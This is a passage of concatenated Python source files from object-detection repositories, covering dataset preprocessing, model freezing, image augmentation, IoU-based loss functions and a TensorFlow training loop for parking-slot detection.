y_true[j, i, k, 0:4] = true_boxes[t, 0:4]
re = np.cos(true_boxes[t, 4])
im = np.sin(true_boxes[t, 4])
#print('|', j, i, k, c, t, true_boxes[t, 0], true_boxes[t, 1])
y_true[j, i, k, 4] = re
y_true[j, i, k, 5] = im
y_true[j, i, k, 6] = 1
y_true[j, i, k, 7 + c] = 1
return image, y_true
```
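A hedged usage sketch for the `Dataset` class above; the sample id `"000123"` is a placeholder, and the paths come from `cfg.config` exactly as the class reads them:
```python
dataset = Dataset()
bev_image = dataset.load_bev_image("000123")  # (H, W, 3) density/height/intensity BEV map
bev_label = dataset.load_bev_label("000123")  # (300, 6) rows of [cx, cy, w, h, yaw, class], zero-padded
image, y_true = dataset.preprocess_true_data(bev_image, bev_label)
print(image.shape, y_true.shape)  # BEV input and the per-anchor training target
```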
#### File: Complex-YOLOv2/utils/dataset_utils.py
```python
import os
import numpy as np
import tensorflow as tf
from model import network
from cfg.config import path_params, model_params
from tensorflow.python.framework import graph_util
def total_sample(file_name):
sample_nums = 0
for record in tf.python_io.tf_record_iterator(file_name):
sample_nums += 1
return sample_nums
def create_trainval_txt(root_path):
data_path = os.path.join(root_path, 'object/training/livox')
trainval = os.path.join(root_path, 'ImageSets/Main/trainval.txt')
if os.path.exists(trainval):
os.remove(trainval)
file_obj = open(trainval, 'w', encoding='utf-8')
file_list = os.listdir(data_path)
for file in file_list:
filename = os.path.splitext(file)[0]
file_obj.writelines(filename)
file_obj.write('\n')
file_obj.close()
def freeze_graph(checkpoints_path, output_graph):
"""
    :param checkpoints_path: path to the ckpt checkpoint file
    :param output_graph: path where the frozen pb model is saved
:return:
"""
with tf.Graph().as_default():
image = tf.placeholder(shape=[None, 608, 608, 3], dtype=tf.float32, name='inputs')
        # Names of the output nodes; they must already exist in the original model graph
output_node_names = "reorg_layer/obj_probs,reorg_layer/class_probs,reorg_layer/bboxes_probs"
        # Build the graph structure from the model code
Model = network.Network(is_train=False)
logits = Model.build_network(image)
output = Model.reorg_layer(logits, model_params['anchors'])
        # Alternatively, restore the structure from the .meta file:
#saver = tf.train.import_meta_graph(checkpoints_path + '.meta', clear_devices=True)
        # Get the default graph
graph = tf.get_default_graph()
        # Return a serialized GraphDef representing the current graph
input_graph_def = graph.as_graph_def()
with tf.Session() as sess:
saver = tf.train.Saver()
            # Restore the graph and its weights
saver.restore(sess, checkpoints_path)
            # Freeze the model: convert variable values to constants
output_graph_def = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=input_graph_def,
output_node_names=output_node_names.split(","))
            # Strip training-only nodes, keeping just the inference backbone
output_graph_def = graph_util.remove_training_nodes(
output_graph_def)
            # Save the frozen model
with tf.gfile.GFile(output_graph, "wb") as f:
                # Serialize and write the output
f.write(output_graph_def.SerializeToString())
            # Report how many ops remain in the final graph
print("%d ops in the final graph." %len(output_graph_def.node))
# for op in graph.get_operations():
# print(op.name, op.values())
if __name__ == '__main__':
#create_trainval_txt(path_params['data_path'])
input_checkpoint='/home/chenwei/HDD/Project/Complex-YOLOv2/checkpoints/model.ckpt-43'
out_pb_path="/home/chenwei/HDD/Project/Complex-YOLOv2/pb/frozen_model.pb"
freeze_graph(input_checkpoint, out_pb_path)
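    # A minimal sketch of loading the frozen pb back (standard TF1 calls,
    # left as comments so the script's behavior is unchanged):
    #   with tf.gfile.GFile(out_pb_path, "rb") as f:
    #       graph_def = tf.GraphDef()
    #       graph_def.ParseFromString(f.read())
    #   with tf.Graph().as_default() as graph:
    #       tf.import_graph_def(graph_def, name="")
    #       inputs = graph.get_tensor_by_name("inputs:0")
    #       obj_probs = graph.get_tensor_by_name("reorg_layer/obj_probs:0")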
``` |
{
"source": "530824679/KPROI",
"score": 2
} |
#### File: KPROI/utils/postprocess.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
def get_max_preds(batch_heatmaps):
'''
get predictions from score maps
heatmaps: numpy.ndarray([batch_size, num_joints, height, width])
'''
assert isinstance(batch_heatmaps, np.ndarray), 'batch_heatmaps should be numpy.ndarray'
assert batch_heatmaps.ndim == 4, 'batch_images should be 4-ndim'
batch_size = batch_heatmaps.shape[0]
num_joints = batch_heatmaps.shape[1]
width = batch_heatmaps.shape[3]
heatmaps_reshaped = batch_heatmaps.reshape((batch_size, num_joints, -1))
idx = np.argmax(heatmaps_reshaped, 2)
maxvals = np.amax(heatmaps_reshaped, 2)
maxvals = maxvals.reshape((batch_size, num_joints, 1))
idx = idx.reshape((batch_size, num_joints, 1))
preds = np.tile(idx, (1, 1, 2)).astype(np.float32)
preds[:, :, 0] = (preds[:, :, 0]) % width
preds[:, :, 1] = np.floor((preds[:, :, 1]) / width)
pred_mask = np.tile(np.greater(maxvals, 0.0), (1, 1, 2))
pred_mask = pred_mask.astype(np.float32)
preds *= pred_mask
return preds, maxvals
```
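A small self-contained check of `get_max_preds` on a toy heatmap batch; the single peak is planted at (x=5, y=3) and recovered below:
```python
import numpy as np

heatmaps = np.zeros((1, 1, 8, 8), dtype=np.float32)  # [batch, joints, height, width]
heatmaps[0, 0, 3, 5] = 1.0                           # one peak at x=5, y=3
preds, maxvals = get_max_preds(heatmaps)
print(preds[0, 0])    # [5. 3.] -> (x, y) of the peak
print(maxvals[0, 0])  # [1.]
```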
#### File: KPROI/utils/preprocess.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
def filter_dataset(data_dir):
"""
    Walk the images and labels folders in step and delete any image without a matching label file.
    param data_dir: data root directory containing the two subfolders images and labels
"""
images_dir = os.path.join(data_dir, "images")
labels_dir = os.path.join(data_dir, "labels")
file_list = os.listdir(images_dir)
for file in file_list:
filename = os.path.splitext(file)[0]
path = os.path.join(labels_dir, filename) + '.json'
if not os.path.exists(path):
os.remove(os.path.join(images_dir, file))
def write_txt(img_dir, label_dir):
train_list = []
filelist = os.listdir(label_dir)
for filename in filelist:
try:
train_list.append(os.path.splitext(filename)[0])
except:
print(filename + 'wrong')
continue
with open(os.path.join(img_dir, 'index.txt'), 'w') as index_file:
for text in train_list:
# print(text)
index_file.write(text + '\n')
if __name__ == '__main__':
# filter_dataset("/home/chenwei/HDD/Project/private/KPROI/datas/training")
write_txt("F:\\img", "F:\\anno")
``` |
{
"source": "530824679/NanoDet-Plus",
"score": 3
} |
#### File: NanoDet-Plus/dataset/augment.py
```python
import cv2
import math
import random
import numpy as np
def random_brightness(image, delta):
image += random.uniform(-delta, delta)
return image
def random_contrast(image, alpha_low, alpha_up):
image *= random.uniform(alpha_low, alpha_up)
return image
def random_saturation(image, alpha_low, alpha_up):
hsv_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_BGR2HSV)
hsv_image[..., 1] *= random.uniform(alpha_low, alpha_up)
image = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR)
return image
def normalize(meta, mean, std):
image = meta['image'].astype(np.float32)
mean = np.array(mean, dtype=np.float64).reshape(1, -1)
stdinv = 1 / np.array(std, dtype=np.float64).reshape(1, -1)
cv2.subtract(image, mean, image)
cv2.multiply(image, stdinv, image)
meta['image'] = image
return meta
def _normalize(image, mean, std):
mean = np.array(mean, dtype=np.float32).reshape(1, 1, 3) / 255
std = np.array(std, dtype=np.float32).reshape(1, 1, 3) / 255
image = (image - mean) / std
return image
def color_aug_and_norm(meta, kwargs):
image = meta['image'].astype(np.float32) / 255
if 'brightness' in kwargs and random.randint(0, 1):
image = random_brightness(image, kwargs['brightness'])
if 'contrast' in kwargs and random.randint(0, 1):
image = random_contrast(image, *kwargs['contrast'])
if 'saturation' in kwargs and random.randint(0, 1):
image = random_saturation(image, *kwargs['saturation'])
# cv2.imshow('trans', img)
# cv2.waitKey(0)
image = _normalize(image, *kwargs['normalize'])
meta['image'] = image
return meta
def get_flip_matrix(prob=0.5):
F = np.eye(3)
if random.random() < prob:
F[0, 0] = -1
return F
def get_perspective_matrix(perspective=0):
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
return P
def get_rotation_matrix(degree=0):
R = np.eye(3)
a = random.uniform(-degree, degree)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=1)
return R
def get_scale_matrix(ratio=(1, 1)):
Scl = np.eye(3)
scale = random.uniform(*ratio)
Scl[0, 0] *= scale
Scl[1, 1] *= scale
return Scl
def get_stretch_matrix(width_ratio=(1, 1), height_ratio=(1, 1)):
Str = np.eye(3)
Str[0, 0] *= random.uniform(*width_ratio)
Str[1, 1] *= random.uniform(*height_ratio)
return Str
def get_shear_matrix(degree):
Sh = np.eye(3)
Sh[0, 1] = math.tan(random.uniform(-degree, degree) * math.pi / 180) # x shear (deg)
Sh[1, 0] = math.tan(random.uniform(-degree, degree) * math.pi / 180) # y shear (deg)
return Sh
def get_translate_matrix(translate, width, height):
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation
return T
def get_resize_matrix(raw_shape, dst_shape, keep_ratio):
"""
Get resize matrix for resizing raw img to input size
:param raw_shape: (width, height) of raw image
:param dst_shape: (width, height) of input image
:param keep_ratio: whether keep original ratio
:return: 3x3 Matrix
"""
r_w, r_h = raw_shape
d_w, d_h = dst_shape
Rs = np.eye(3)
if keep_ratio:
C = np.eye(3)
C[0, 2] = - r_w / 2
C[1, 2] = - r_h / 2
if r_w / r_h < d_w / d_h:
ratio = d_h / r_h
else:
ratio = d_w / r_w
Rs[0, 0] *= ratio
Rs[1, 1] *= ratio
T = np.eye(3)
T[0, 2] = 0.5 * d_w
T[1, 2] = 0.5 * d_h
return T @ Rs @ C
else:
Rs[0, 0] *= d_w / r_w
Rs[1, 1] *= d_h / r_h
return Rs
def warp_and_resize(meta, warp_kwargs, dst_shape, keep_ratio=True):
raw_img = meta['image']
height = raw_img.shape[0] # shape(h,w,c)
width = raw_img.shape[1]
# center
C = np.eye(3)
C[0, 2] = - width / 2
C[1, 2] = - height / 2
# do not change the order of mat mul
if 'perspective' in warp_kwargs and random.randint(0, 1):
P = get_perspective_matrix(warp_kwargs['perspective'])
C = P @ C
if 'scale' in warp_kwargs and random.randint(0, 1):
Scl = get_scale_matrix(warp_kwargs['scale'])
C = Scl @ C
if 'stretch' in warp_kwargs and random.randint(0, 1):
Str = get_stretch_matrix(*warp_kwargs['stretch'])
C = Str @ C
if 'rotation' in warp_kwargs and random.randint(0, 1):
R = get_rotation_matrix(warp_kwargs['rotation'])
C = R @ C
if 'shear' in warp_kwargs and random.randint(0, 1):
Sh = get_shear_matrix(warp_kwargs['shear'])
C = Sh @ C
if 'flip' in warp_kwargs:
F = get_flip_matrix(warp_kwargs['flip'])
C = F @ C
if 'translate' in warp_kwargs and random.randint(0, 1):
T = get_translate_matrix(warp_kwargs['translate'], width, height)
else:
T = get_translate_matrix(0, width, height)
M = T @ C
# M = T @ Sh @ R @ Str @ P @ C
ResizeM = get_resize_matrix((width, height), dst_shape, keep_ratio)
M = ResizeM @ M
image = cv2.warpPerspective(raw_img, M, dsize=tuple(dst_shape))
meta['image'] = image
meta['warp_matrix'] = M
if 'gt_bboxes' in meta:
boxes = meta['gt_bboxes']
meta['gt_bboxes'] = warp_boxes(boxes, M, dst_shape[0], dst_shape[1])
if 'gt_masks' in meta:
for i, mask in enumerate(meta['gt_masks']):
meta['gt_masks'][i] = cv2.warpPerspective(mask, M, dsize=tuple(dst_shape))
return meta
def warp_boxes(boxes, M, width, height):
n = len(boxes)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = boxes[:, [0, 1, 2, 3, 0, 3, 2, 1]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
return xy.astype(np.float32)
else:
return boxes
```
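A hedged sketch composing the matrix helpers above: build a letterbox resize from a 640x480 frame to 416x416 and push one box through it with `warp_boxes` (the box values are illustrative):
```python
import numpy as np

ResizeM = get_resize_matrix((640, 480), (416, 416), keep_ratio=True)
boxes = np.array([[100., 100., 300., 200.]], dtype=np.float32)  # x1, y1, x2, y2
warped = warp_boxes(boxes, ResizeM, width=416, height=416)
print(warped)  # [[ 65. 117. 195. 182.]] -> the box inside the 416x416 letterboxed frame
```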
#### File: NanoDet-Plus/loss/iou_loss.py
```python
import math
import torch
import torch.nn as nn
# weighted_loss is assumed to be the mmdet-style decorator that adds
# weight/reduction/avg_factor handling; its exact module path here is a guess.
from loss.utils import weighted_loss
def bbox_overlaps(bboxes1, bboxes2, mode='iou', is_aligned=False, eps=1e-6):
assert mode in ['iou', 'giou', 'diou', 'ciou'], f'Unsupported mode {mode}'
assert (bboxes1.size(-1) == 4 or bboxes1.size(0) == 0)
assert (bboxes2.size(-1) == 4 or bboxes2.size(0) == 0)
assert bboxes1.shape[:-2] == bboxes2.shape[:-2]
batch_shape = bboxes1.shape[:-2]
rows = bboxes1.size(-2)
cols = bboxes2.size(-2)
if is_aligned:
assert rows == cols
if rows * cols == 0:
if is_aligned:
return bboxes1.new(batch_shape + (rows,))
else:
return bboxes1.new(batch_shape + (rows, cols))
area1 = (bboxes1[..., 2] - bboxes1[..., 0]) * (bboxes1[..., 3] - bboxes1[..., 1])
area2 = (bboxes2[..., 2] - bboxes2[..., 0]) * (bboxes2[..., 3] - bboxes2[..., 1])
if is_aligned:
lt = torch.max(bboxes1[..., :2], bboxes2[..., :2]) # [B, rows, 2]
rb = torch.min(bboxes1[..., 2:], bboxes2[..., 2:]) # [B, rows, 2]
wh = (rb - lt).clamp(min=0) # [B, rows, 2]
overlap = wh[..., 0] * wh[..., 1]
if mode in ['iou', 'giou']:
union = area1 + area2 - overlap
else:
union = area1
if mode == 'giou':
enclosed_lt = torch.min(bboxes1[..., :2], bboxes2[..., :2])
enclosed_rb = torch.max(bboxes1[..., 2:], bboxes2[..., 2:])
else:
lt = torch.max(bboxes1[..., :, None, :2], bboxes2[..., None, :, :2]) # [B, rows, cols, 2]
rb = torch.min(bboxes1[..., :, None, 2:], bboxes2[..., None, :, 2:]) # [B, rows, cols, 2]
wh = (rb - lt).clamp(min=0) # [B, rows, cols, 2]
overlap = wh[..., 0] * wh[..., 1]
if mode in ['iou', 'giou']:
union = area1[..., None] + area2[..., None, :] - overlap
else:
union = area1[..., None]
if mode == 'giou':
enclosed_lt = torch.min(bboxes1[..., :, None, :2], bboxes2[..., None, :, :2])
enclosed_rb = torch.max(bboxes1[..., :, None, 2:], bboxes2[..., None, :, 2:])
eps = union.new_tensor([eps])
union = torch.max(union, eps)
ious = overlap / union
if mode in ['iou', 'iof']:
return ious
# calculate gious
enclose_wh = (enclosed_rb - enclosed_lt).clamp(min=0)
enclose_area = enclose_wh[..., 0] * enclose_wh[..., 1]
enclose_area = torch.max(enclose_area, eps)
gious = ious - (enclose_area - union) / enclose_area
return gious
@weighted_loss
def iou_loss(pred, target, eps=1e-6):
ious = bbox_overlaps(pred, target, is_aligned=True).clamp(min=eps)
loss = -ious.log()
return loss
@weighted_loss
def giou_loss(pred, target, eps=1e-7):
gious = bbox_overlaps(pred, target, mode='giou', is_aligned=True, eps=eps)
loss = 1 - gious
return loss
@weighted_loss
def diou_loss(pred, target, eps=1e-7):
# overlap
lt = torch.max(pred[:, :2], target[:, :2])
rb = torch.min(pred[:, 2:], target[:, 2:])
wh = (rb - lt).clamp(min=0)
overlap = wh[:, 0] * wh[:, 1]
# union
ap = (pred[:, 2] - pred[:, 0]) * (pred[:, 3] - pred[:, 1])
ag = (target[:, 2] - target[:, 0]) * (target[:, 3] - target[:, 1])
union = ap + ag - overlap + eps
# IoU
ious = overlap / union
# enclose area
enclose_x1y1 = torch.min(pred[:, :2], target[:, :2])
enclose_x2y2 = torch.max(pred[:, 2:], target[:, 2:])
enclose_wh = (enclose_x2y2 - enclose_x1y1).clamp(min=0)
cw = enclose_wh[:, 0]
ch = enclose_wh[:, 1]
c2 = cw**2 + ch**2 + eps
b1_x1, b1_y1 = pred[:, 0], pred[:, 1]
b1_x2, b1_y2 = pred[:, 2], pred[:, 3]
b2_x1, b2_y1 = target[:, 0], target[:, 1]
b2_x2, b2_y2 = target[:, 2], target[:, 3]
left = ((b2_x1 + b2_x2) - (b1_x1 + b1_x2))**2 / 4
right = ((b2_y1 + b2_y2) - (b1_y1 + b1_y2))**2 / 4
rho2 = left + right
# DIoU
dious = ious - rho2 / c2
loss = 1 - dious
return loss
@weighted_loss
def ciou_loss(pred, target, eps=1e-7):
# overlap
lt = torch.max(pred[:, :2], target[:, :2])
rb = torch.min(pred[:, 2:], target[:, 2:])
wh = (rb - lt).clamp(min=0)
overlap = wh[:, 0] * wh[:, 1]
# union
ap = (pred[:, 2] - pred[:, 0]) * (pred[:, 3] - pred[:, 1])
ag = (target[:, 2] - target[:, 0]) * (target[:, 3] - target[:, 1])
union = ap + ag - overlap + eps
# IoU
ious = overlap / union
# enclose area
enclose_x1y1 = torch.min(pred[:, :2], target[:, :2])
enclose_x2y2 = torch.max(pred[:, 2:], target[:, 2:])
enclose_wh = (enclose_x2y2 - enclose_x1y1).clamp(min=0)
cw = enclose_wh[:, 0]
ch = enclose_wh[:, 1]
c2 = cw**2 + ch**2 + eps
b1_x1, b1_y1 = pred[:, 0], pred[:, 1]
b1_x2, b1_y2 = pred[:, 2], pred[:, 3]
b2_x1, b2_y1 = target[:, 0], target[:, 1]
b2_x2, b2_y2 = target[:, 2], target[:, 3]
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
left = ((b2_x1 + b2_x2) - (b1_x1 + b1_x2))**2 / 4
right = ((b2_y1 + b2_y2) - (b1_y1 + b1_y2))**2 / 4
rho2 = left + right
factor = 4 / math.pi**2
v = factor * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
# CIoU
cious = ious - (rho2 / c2 + v**2 / (1 - ious + v))
loss = 1 - cious
return loss
class IoULoss(nn.Module):
def __init__(self, eps=1e-6, reduction='mean', loss_weight=1.0):
super(IoULoss, self).__init__()
self.eps = eps
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self, pred, target, weight=None, avg_factor=None, reduction_override=None, **kwargs):
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if (weight is not None) and (not torch.any(weight > 0)) and (reduction != 'none'):
return (pred * weight).sum() # 0
if weight is not None and weight.dim() > 1:
assert weight.shape == pred.shape
weight = weight.mean(-1)
loss = self.loss_weight * iou_loss(pred, target, weight, eps=self.eps, reduction=reduction, avg_factor=avg_factor, **kwargs)
return loss
class GIoULoss(nn.Module):
def __init__(self, eps=1e-6, reduction='mean', loss_weight=1.0):
super(GIoULoss, self).__init__()
self.eps = eps
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self, pred, target, weight=None, avg_factor=None, reduction_override=None, **kwargs):
if weight is not None and not torch.any(weight > 0):
# return (pred * weight).sum() # 0 #TODO: fix bug
return pred.sum() * 0. # 0
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if weight is not None and weight.dim() > 1:
assert weight.shape == pred.shape
weight = weight.mean(-1)
loss = self.loss_weight * giou_loss(pred, target, weight, eps=self.eps, reduction=reduction, avg_factor=avg_factor, **kwargs)
return loss
class DIoULoss(nn.Module):
def __init__(self, eps=1e-6, reduction='mean', loss_weight=1.0):
super(DIoULoss, self).__init__()
self.eps = eps
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self, pred, target, weight=None, avg_factor=None, reduction_override=None, **kwargs):
if weight is not None and not torch.any(weight > 0):
return (pred * weight).sum() # 0
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if weight is not None and weight.dim() > 1:
assert weight.shape == pred.shape
weight = weight.mean(-1)
loss = self.loss_weight * diou_loss(pred, target, weight, eps=self.eps, reduction=reduction, avg_factor=avg_factor, **kwargs)
return loss
class CIoULoss(nn.Module):
def __init__(self, eps=1e-6, reduction='mean', loss_weight=1.0):
super(CIoULoss, self).__init__()
self.eps = eps
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self, pred, target, weight=None, avg_factor=None, reduction_override=None, **kwargs):
if weight is not None and not torch.any(weight > 0):
return (pred * weight).sum() # 0
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if weight is not None and weight.dim() > 1:
assert weight.shape == pred.shape
weight = weight.mean(-1)
loss = self.loss_weight * ciou_loss(pred, target, weight, eps=self.eps, reduction=reduction, avg_factor=avg_factor, **kwargs)
return loss
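# A quick hand check of bbox_overlaps on two illustrative boxes, left as
# comments (runnable once the weighted_loss import resolves):
#   pred = torch.tensor([[0., 0., 10., 10.]])
#   target = torch.tensor([[5., 5., 15., 15.]])
#   bbox_overlaps(pred, target, mode='iou', is_aligned=True)   # 25/175 ~= 0.1429
#   bbox_overlaps(pred, target, mode='giou', is_aligned=True)  # 0.1429 - 50/225 ~= -0.0794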
``` |
{
"source": "530824679/Parking-slot-Detection",
"score": 2
} |
#### File: 530824679/Parking-slot-Detection/train.py
```python
import os
import math
import shutil
import numpy as np
import tensorflow as tf
import glog as log
from cfg.config import path_params, model_params, solver_params
from model.network import Network
from data import dataset, tfrecord
from utils.data_utils import *
def config_warmup_lr(global_step, warmup_steps, name):
with tf.variable_scope(name_or_scope=name):
warmup_init_learning_rate = solver_params['init_learning_rate'] / 1000.0
factor = tf.math.pow(solver_params['init_learning_rate'] / warmup_init_learning_rate, 1.0 / warmup_steps)
warmup_lr = warmup_init_learning_rate * tf.math.pow(factor, global_step)
return warmup_lr
def config_cosine_lr(steps, batch_size, num_epochs, name):
with tf.variable_scope(name_or_scope=name):
lr_init = 0.008 * batch_size / 64
warmup_init = 0.0008
warmup_step = steps
decay_steps = tf.cast((num_epochs - 1) * warmup_step, tf.float32)
linear_warmup = tf.cast(steps, dtype=tf.float32) / warmup_step * (lr_init - warmup_init)
cosine_lr = 0.5 * lr_init * (1 + tf.cos(math.pi * tf.cast(steps, tf.float32) / decay_steps))
lr = tf.where(steps < warmup_step, warmup_init + linear_warmup, cosine_lr)
return lr
def config_optimizer(optimizer_name, lr_init, momentum=0.99):
log.info("message:配置优化器:'" + str(optimizer_name) + "'")
if optimizer_name == 'momentum':
return tf.train.MomentumOptimizer(learning_rate=lr_init, momentum=momentum)
elif optimizer_name == 'adam':
return tf.train.AdamOptimizer(learning_rate=lr_init)
elif optimizer_name == 'sgd':
return tf.train.GradientDescentOptimizer(learning_rate=lr_init)
else:
log.error("error:不支持的优化器类型:'" + str(optimizer_name) + "'")
raise ValueError(str(optimizer_name) + ":不支持的优化器类型")
def compute_curr_epoch(global_step, batch_size, image_num):
epoch = global_step * batch_size / image_num
return tf.cast(epoch, tf.int32)
def train():
start_step = 0
input_height = model_params['input_height']
input_width = model_params['input_width']
num_epochs = solver_params['total_epoches']
batch_size = solver_params['batch_size']
checkpoint_dir = path_params['checkpoints_dir']
tfrecord_dir = path_params['tfrecord_dir']
log_dir = path_params['logs_dir']
initial_weight = path_params['initial_weight']
restore = solver_params['restore']
classes = read_class_names(path_params['class_file'])
class_num = len(classes)
    # Create the required directories
ckpt_path = path_params['checkpoints_dir']
if not os.path.exists(ckpt_path):
os.makedirs(ckpt_path)
logs_path = path_params['logs_dir']
if os.path.exists(logs_path):
shutil.rmtree(logs_path)
os.makedirs(logs_path)
    # Configure GPU resources
gpu_options = tf.ConfigProto(allow_soft_placement=True)
gpu_options.gpu_options.allow_growth = True
gpu_options.gpu_options.allocator_type = 'BFC'
    # Parse the training samples and their annotations
data = tfrecord.TFRecord()
train_tfrecord = os.path.join(tfrecord_dir, "train.tfrecord")
data_num = total_sample(train_tfrecord)
batch_num = int(math.ceil(float(data_num) / batch_size))
dataset = data.create_dataset(train_tfrecord, batch_num, batch_size=batch_size, is_shuffle=False)
    # Create the training and validation data iterators
iterator = dataset.make_one_shot_iterator()
inputs, y_true_1, y_true_2, y_true_3 = iterator.get_next()
inputs.set_shape([None, input_height, input_width, 3])
y_true_1.set_shape([None, 20, 20, 3, 5 + class_num])
y_true_2.set_shape([None, 40, 40, 3, 5 + class_num])
y_true_3.set_shape([None, 80, 80, 3, 5 + class_num])
y_true = [y_true_1, y_true_2, y_true_3]
    # Build the network and compute the loss
with tf.variable_scope('ODET'):
model = Network(is_train=True)
logits = model.forward(inputs)
        # Compute the losses
loss_op = model.calc_loss(logits, y_true)
l2_loss = tf.losses.get_regularization_loss()
total_loss = loss_op[0] + loss_op[1] + loss_op[2] + loss_op[3] + l2_loss
# define training op
global_step = tf.Variable(float(0), dtype=tf.float64, trainable=False, collections=[tf.GraphKeys.LOCAL_VARIABLES])
learning_rate = config_cosine_lr(batch_num, batch_size, num_epochs, 'learning_lr')
#optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.937)
optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=0.99)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
#train_op = optimizer.minimize(total_loss, global_step=global_step)
gvs = optimizer.compute_gradients(total_loss)
clip_grad_var = [gv if gv[0] is None else [tf.clip_by_norm(gv[0], 5.), gv[1]] for gv in gvs]
train_op = optimizer.apply_gradients(clip_grad_var, global_step=global_step)
    # Model saving
loader = tf.train.Saver()#tf.moving_average_variables())
save_variable = tf.global_variables()
saver = tf.train.Saver(save_variable, max_to_keep=1000)
    # Configure TensorBoard
tf.summary.scalar('learn_rate', learning_rate)
tf.summary.scalar("xy_loss", loss_op[0])
tf.summary.scalar("wh_loss", loss_op[1])
tf.summary.scalar("conf_loss", loss_op[2])
tf.summary.scalar("class_loss", loss_op[3])
tf.summary.scalar('total_loss', total_loss)
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph(), flush_secs=60)
    # Start training
with tf.Session(config=gpu_options) as sess:
sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
if restore == True:
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
stem = os.path.basename(ckpt.model_checkpoint_path)
restore_step = int(stem.split('.')[0].split('-')[-1])
start_step = restore_step
sess.run(global_step.assign(restore_step))
loader.restore(sess, ckpt.model_checkpoint_path)
                print('Restoring from {}'.format(ckpt.model_checkpoint_path))
else:
print("Failed to find a checkpoint")
summary_writer.add_graph(sess.graph)
try:
print('=> Restoring weights from: %s ... ' % initial_weight)
loader.restore(sess, initial_weight)
except:
print('=> %s does not exist !!!' % initial_weight)
print('=> Now it starts to train from scratch ...')
print('\n----------- start to train -----------\n')
for epoch in range(start_step + 1, num_epochs):
train_epoch_loss, train_epoch_xy_loss, train_epoch_wh_loss, train_epoch_confs_loss, train_epoch_class_loss = [], [], [], [], []
for index in tqdm(range(batch_num)):
_, summary_, loss_, xy_loss_, wh_loss_, confs_loss_, class_loss_, global_step_, lr = sess.run(
[train_op, summary_op, total_loss, loss_op[0], loss_op[1], loss_op[2], loss_op[3], global_step, learning_rate])
train_epoch_loss.append(loss_)
train_epoch_xy_loss.append(xy_loss_)
train_epoch_wh_loss.append(wh_loss_)
train_epoch_confs_loss.append(confs_loss_)
train_epoch_class_loss.append(class_loss_)
summary_writer.add_summary(summary_, global_step_)
train_epoch_loss, train_epoch_xy_loss, train_epoch_wh_loss, train_epoch_confs_loss, train_epoch_class_loss = np.mean(train_epoch_loss), np.mean(train_epoch_xy_loss), np.mean(train_epoch_wh_loss), np.mean(train_epoch_confs_loss), np.mean(train_epoch_class_loss)
print("Epoch: {}, global_step: {}, lr: {:.8f}, total_loss: {:.3f}, xy_loss: {:.3f}, wh_loss: {:.3f}, confs_loss: {:.3f}, class_loss: {:.3f}".format(epoch, global_step_, lr, train_epoch_loss, train_epoch_xy_loss, train_epoch_wh_loss, train_epoch_confs_loss, train_epoch_class_loss))
snapshot_model_name = 'odet_train_mloss={:.4f}.ckpt'.format(train_epoch_loss)
saver.save(sess, os.path.join(checkpoint_dir, snapshot_model_name), global_step=epoch)
sess.close()
if __name__ == '__main__':
train()
```
#### File: Parking-slot-Detection/utils/data_utils.py
```python
import os
import json
import glob
import shutil
from tqdm import tqdm
from PIL import Image
from shutil import copy
import numpy as np
import tensorflow as tf
def rename_datas(root_path, dst_path):
src_image_dir = os.path.join(root_path, "images")
src_label_dir = os.path.join(root_path, "labels")
dst_image_dir = os.path.join(dst_path, "images")
dst_label_dir = os.path.join(dst_path, "labels")
image_count = 0
for root, dirs, files in os.walk(src_image_dir):
for name in files:
print(os.path.join(root, name))
src_image_path = os.path.join(root, name)
src_label_path = os.path.join(root.replace("images", "labels"), name.replace("png", "json"))
dst_image_path = os.path.join(dst_image_dir, '%08d' % int(image_count))
dst_label_path = os.path.join(dst_label_dir, '%08d' % int(image_count))
shutil.copy(src_image_path, dst_image_path + '.png')
shutil.copy(src_label_path, dst_label_path + '.json')
image_count += 1
def get_files(path, _ends=['*.json']):
all_files = []
for _end in _ends:
files = glob.glob(os.path.join(path, _end))
all_files.extend(files)
file_num = len(all_files)
return all_files, file_num
def get_size(result_dict):
obj_size = result_dict['size']
width = obj_size["width"]
height = obj_size["height"]
return width, height
